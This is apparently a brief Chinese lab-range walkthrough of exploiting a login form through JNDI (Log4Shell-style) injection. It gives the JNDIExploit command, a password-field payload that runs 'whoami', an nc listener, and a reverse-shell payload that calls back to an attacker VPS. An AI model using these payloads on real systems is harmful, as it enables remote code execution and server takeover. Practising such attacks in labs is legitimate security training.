提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
一、工具
二、靶场
看网页源码
猜测就是username和password为注入点
三、步骤
vps有java环境
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP
成功运行
向密码框填入${jndi:ldap://vps的IP:1389/Basic/Command/whoami}
登录
有回显
先在vps运行 nc -lvp 6666
监听6666
向密码框填入${jndi:ldap://vps的IP:1389/Basic/ReverseShell/vps的IP/6666}
登录
成功回传shell
总结
😀